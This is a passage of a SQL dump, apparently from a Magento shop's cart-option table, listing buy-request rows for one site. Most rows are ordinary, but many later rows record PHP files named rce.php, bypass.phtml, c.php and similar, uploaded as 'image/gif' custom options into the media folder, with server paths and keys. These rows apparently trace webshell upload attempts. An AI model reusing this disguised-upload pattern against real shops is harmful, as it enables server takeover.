(186, 178, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(187, 179, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(188, 180, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(189, 181, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(190, 182, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(191, 183, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(192, 184, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(193, 185, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(194, 186, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(195, 187, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(196, 188, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(197, 189, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(198, 190, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(199, 191, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(200, 192, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(201, 193, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(202, 194, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(203, 195, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tb2lzdHVyaXplaW5nLWZhY2Utd2FzaC1vcm5hbWVudGFsLWxlbW9uLWV4dHJhY3QtbWFkZS1mcm9tLW5hdHVyYWwuaHRtbA,,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":\"1\",\"ajax\":\"1\"}'),
(204, 196, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2062\",\"qty\":1}'),
(205, 197, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(206, 198, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(207, 199, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(208, 200, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(209, 201, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(210, 202, 2058, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWxlc3MtZmFpcm5lc3MtY3JlYW0uaHRtbA,,\",\"product\":\"2058\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2058\",\"qty\":\"1\"}'),
(211, 203, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"qty\":\"1\"}'),
(212, 204, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC1mYWNlLmh0bWw,\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2063\",\"qty\":\"1\"}'),
(213, 205, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":\"1\"}'),
(214, 206, 2058, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWxlc3MtZmFpcm5lc3MtY3JlYW0uaHRtbA,,\",\"product\":\"2058\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2058\",\"qty\":1}'),
(215, 207, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\"}'),
(216, 208, 2055, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2055\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\"}'),
(217, 209, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\"}'),
(218, 210, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\"}'),
(219, 211, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\"}'),
(220, 212, 2059, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2059\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\"}'),
(221, 213, 2058, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2058\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\"}'),
(222, 214, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\"}'),
(223, 215, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\"}'),
(224, 216, 2053, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2053\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\",\"item\":\"2053\",\"super_attribute\":{\"93\":\"5485\",\"145\":\"5602\"}}'),
(225, 216, 2053, 'attributes', '{\"93\":\"5485\",\"145\":\"5602\"}'),
(226, 216, 2052, 'product_qty_2052', '1'),
(227, 216, 2052, 'simple_product', '2052'),
(228, 217, 2052, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9xPWErYQ==\",\"product\":\"2053\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\",\"item\":\"2053\",\"super_attribute\":{\"93\":\"5485\",\"145\":\"5602\"}}'),
(229, 217, 2052, 'parent_product_id', '2053'),
(230, 218, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY3JlYW0uaHRtbD9mYmNsaWQ9SXdZMnhqYXdRa28ybGxlSFJ1QTJGbGJRSXhNUUJ6Y25SakJtRndjRjlwWkF3ek5UQTJPRFUxTXpFM01qZ0FBUjdqYmlkWExXNVM5T0dnbW1MZ01BNzdoZnYzQTFqNjI1ZXBfU0VLU25ueUlaLWVJS0hnZVMweWJGYVUzZ19hZW1fR3hXN3B6dXJZS1BJT01zWHRGd05CQQ,,\",\"product\":\"2064\",\"qty\":1}'),
(231, 219, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY3JlYW0uaHRtbD9mYmNsaWQ9SXdZMnhqYXdRa3JscGxlSFJ1QTJGbGJRSXhNUUJ6Y25SakJtRndjRjlwWkF3ek5UQTJPRFUxTXpFM01qZ0FBUjdGajRyd2otOUo1UjEwZTJFZFljYUxEcGpqbGlCU3RNbFRfOWl0OVdRSTJ2bGFqbS1aQUdsRm5OWnNwd19hZW1fa0Q2SEpZU3BORjF3Zk5NUXBsRkQtZw,,\",\"product\":\"2061\",\"qty\":1}'),
(232, 220, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC1mYWNlLmh0bWw,\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2063\",\"qty\":1}'),
(233, 221, 2062, 'info_buyRequest', '{\"options\":{\"621\":{\"type\":\"image\\/gif\",\"title\":\"621index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/2\\/621index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/2\\/621index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/2\\/621index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(234, 222, 2062, 'info_buyRequest', '{\"options\":{\"162\":{\"type\":\"image\\/gif\",\"title\":\"162index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/6\\/162index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/6\\/162index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/6\\/162index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(235, 223, 2062, 'info_buyRequest', '{\"options\":{\"476\":{\"type\":\"image\\/gif\",\"title\":\"476index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/7\\/476index_1.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/7\\/476index_1.php\",\"order_path\":\"custom_options\\/quote\\/4\\/7\\/476index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(236, 224, 2062, 'info_buyRequest', '{\"options\":{\"538\":{\"type\":\"image\\/gif\",\"title\":\"538index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/3\\/538index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/3\\/538index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/3\\/538index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(237, 225, 2062, 'info_buyRequest', '{\"options\":{\"821\":{\"type\":\"image\\/gif\",\"title\":\"821index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/2\\/821index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/2\\/821index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/2\\/821index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(238, 226, 2062, 'info_buyRequest', '{\"options\":{\"160\":{\"type\":\"image\\/gif\",\"title\":\"160index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/6\\/160index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/6\\/160index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/6\\/160index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(239, 227, 2062, 'info_buyRequest', '{\"options\":{\"253\":{\"type\":\"image\\/gif\",\"title\":\"253index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/5\\/253index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/5\\/253index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/5\\/253index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(240, 228, 2062, 'info_buyRequest', '{\"options\":{\"166\":{\"type\":\"image\\/gif\",\"title\":\"166index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/6\\/166index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/6\\/166index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/6\\/166index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(241, 229, 2062, 'info_buyRequest', '{\"options\":{\"889\":{\"type\":\"image\\/gif\",\"title\":\"889index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/8\\/889index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/8\\/889index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/8\\/889index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(242, 230, 2062, 'info_buyRequest', '{\"options\":{\"418\":{\"type\":\"image\\/gif\",\"title\":\"418index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/1\\/418index.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/1\\/418index.php\",\"order_path\":\"custom_options\\/quote\\/4\\/1\\/418index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(243, 231, 2062, 'info_buyRequest', '{\"options\":{\"372\":{\"type\":\"image\\/gif\",\"title\":\"372index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/7\\/372index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/7\\/372index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/7\\/372index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(244, 232, 2062, 'info_buyRequest', '{\"options\":{\"146\":{\"type\":\"image\\/gif\",\"title\":\"146index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/4\\/146index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/4\\/146index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/4\\/146index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(245, 233, 2062, 'info_buyRequest', '{\"options\":{\"358\":{\"type\":\"image\\/gif\",\"title\":\"358index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/5\\/358index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/5\\/358index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/5\\/358index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(246, 234, 2062, 'info_buyRequest', '{\"qty\":1}'),
(247, 235, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"780index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/8\\/780index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/8\\/780index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/8\\/780index.php\",\"size\":324,\"width\":1,\"height\":1,\"secret_key\":\"5307239d7213aab2a09f\"}},\"qty\":1}'),
(248, 236, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"rce.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/r\\/c\\/rce.php\",\"quote_path\":\"custom_options\\/quote\\/r\\/c\\/rce.php\",\"order_path\":\"custom_options\\/quote\\/r\\/c\\/rce.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"bc628418234a9c7b985a\"}},\"qty\":1}'),
(249, 237, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.phtml\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass.phtml\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass.phtml\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass.phtml\",\"size\":324,\"width\":1,\"height\":1,\"secret_key\":\"73ed0e6a603c446ae328\"}},\"qty\":1}'),
(250, 238, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass.php\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass.php\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"00b455f9f2e9b2dd0b4c\"}},\"qty\":1}');
INSERT INTO `quote_item_option` (`option_id`, `item_id`, `product_id`, `code`, `value`) VALUES
(251, 239, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"c.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/c\\/_\\/c.php\",\"quote_path\":\"custom_options\\/quote\\/c\\/_\\/c.php\",\"order_path\":\"custom_options\\/quote\\/c\\/_\\/c.php\",\"size\":68,\"width\":1,\"height\":1,\"secret_key\":\"4fd3d680779ddc7ca667\"}},\"qty\":1}'),
(252, 240, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"static.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/s\\/t\\/static.php\",\"quote_path\":\"custom_options\\/quote\\/s\\/t\\/static.php\",\"order_path\":\"custom_options\\/quote\\/s\\/t\\/static.php\",\"size\":328,\"width\":1,\"height\":1,\"secret_key\":\"781bd52f9b934e2b8912\"}},\"qty\":1}'),
(253, 241, 2062, 'info_buyRequest', '{\"options\":{\"825\":{\"type\":\"image\\/gif\",\"title\":\"825index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/2\\/825index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/2\\/825index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/2\\/825index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(254, 242, 2062, 'info_buyRequest', '{\"options\":{\"713\":{\"type\":\"image\\/gif\",\"title\":\"713index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/1\\/713index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/1\\/713index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/1\\/713index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(255, 243, 2062, 'info_buyRequest', '{\"options\":{\"711\":{\"type\":\"image\\/gif\",\"title\":\"711index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/1\\/711index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/1\\/711index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/1\\/711index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(256, 244, 2062, 'info_buyRequest', '{\"options\":{\"574\":{\"type\":\"image\\/gif\",\"title\":\"574index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/7\\/574index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/7\\/574index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/7\\/574index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(257, 245, 2062, 'info_buyRequest', '{\"qty\":1}'),
(258, 246, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"780index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/8\\/780index_1.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/8\\/780index_1.php\",\"order_path\":\"custom_options\\/quote\\/7\\/8\\/780index_1.php\",\"size\":324,\"width\":1,\"height\":1,\"secret_key\":\"1d96b61718289b309e5c\"}},\"qty\":1}'),
(259, 247, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"rce.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/r\\/c\\/rce_1.php\",\"quote_path\":\"custom_options\\/quote\\/r\\/c\\/rce_1.php\",\"order_path\":\"custom_options\\/quote\\/r\\/c\\/rce_1.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"bbfcd7d56d331f325ca5\"}},\"qty\":1}'),
(260, 248, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.phtml\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_1.phtml\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_1.phtml\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_1.phtml\",\"size\":324,\"width\":1,\"height\":1,\"secret_key\":\"43c19b386aaf24d44e6f\"}},\"qty\":1}'),
(261, 249, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_1.php\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_1.php\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_1.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"43377c9120af2bf2bb60\"}},\"qty\":1}'),
(262, 250, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"c.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/c\\/_\\/c_1.php\",\"quote_path\":\"custom_options\\/quote\\/c\\/_\\/c_1.php\",\"order_path\":\"custom_options\\/quote\\/c\\/_\\/c_1.php\",\"size\":68,\"width\":1,\"height\":1,\"secret_key\":\"b6881eb6cd41b4b010c7\"}},\"qty\":1}'),
